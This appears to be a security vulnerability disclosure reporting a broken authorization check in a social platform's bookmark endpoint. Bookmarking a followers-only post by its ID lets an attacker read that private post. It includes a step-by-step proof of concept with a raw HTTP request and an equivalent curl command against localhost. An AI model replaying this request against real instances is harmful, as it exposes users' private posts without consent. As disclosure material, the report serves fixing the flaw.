Description

The bookmark saving functionality performs improper authorization check.

To exploit this, an attacker is required to know the target post ID. This is done via share link or by (less possibly) brute-forcing.

Proof of Concept

1. [victim] Create a new post whose visibility is Followers Only. In this case the post ID is 521204147650984455.
2. [attacker] Send the following request:

POST /i/bookmark HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 27
Referer: http://localhost/i/web/post/521154091471578587
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: 5DyUM2DySl5UvQmaCgxNTxjLz9G1MlCFCqmZTclf
Cookie: pxfs=eyJpdiI6InF6TXJScWF6NGxkN1hCMkhkNEhBZHc9PSIsInZhbHVlIjoiMEdzKzZVS3c2WUFWS0lKblZTVzliVXlrSUVEMExJUDN2eXduQnc2TzdvVGFTcnpNdlZKSk1Ka2gxeEJwWG1ZZ1Y1K2ljUnc2aHc4bVIvRlQ0MC9xRmIzMTBESFNmaHNTemkxeGR2bnpYanZ5aW5TVE4xMHQ0ZCtydFBuVHJOQ2kiLCJtYWMiOiI4OWY1ZjQ2NjA4Y2FiNWU0MTM1MWVjNjI0MDk0YjU3OWNiNGJjYmRiM2I2NTc4OWRkZWE1OGU2YWI3NmM4ZjI0IiwidGFnIjoiIn0%3D;

{"item":521204147650984455}

Equivalent command:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Content-Type: application/json' -H $'Content-Length: 27' -H $'Referer: http://localhost/i/web/post/521154091471578587' -H $'X-Requested-With: XMLHttpRequest' -H $'X-CSRF-TOKEN: 5DyUM2DySl5UvQmaCgxNTxjLz9G1MlCFCqmZTclf' \
    -b $'pxfs=eyJpdiI6InF6TXJScWF6NGxkN1hCMkhkNEhBZHc9PSIsInZhbHVlIjoiMEdzKzZVS3c2WUFWS0lKblZTVzliVXlrSUVEMExJUDN2eXduQnc2TzdvVGFTcnpNdlZKSk1Ka2gxeEJwWG1ZZ1Y1K2ljUnc2aHc4bVIvRlQ0MC9xRmIzMTBESFNmaHNTemkxeGR2bnpYanZ5aW5TVE4xMHQ0ZCtydFBuVHJOQ2kiLCJtYWMiOiI4OWY1ZjQ2NjA4Y2FiNWU0MTM1MWVjNjI0MDk0YjU3OWNiNGJjYmRiM2I2NTc4OWRkZWE1OGU2YWI3NmM4ZjI0IiwidGFnIjoiIn0%3D' \
    --data-binary $'{\"item\":521204147650984455}' \
    $'http://localhost/i/bookmark'

3. [attacker] Go to my bookmarks and see there is the post created on step. 1.

Impact

An attacker can view private posts.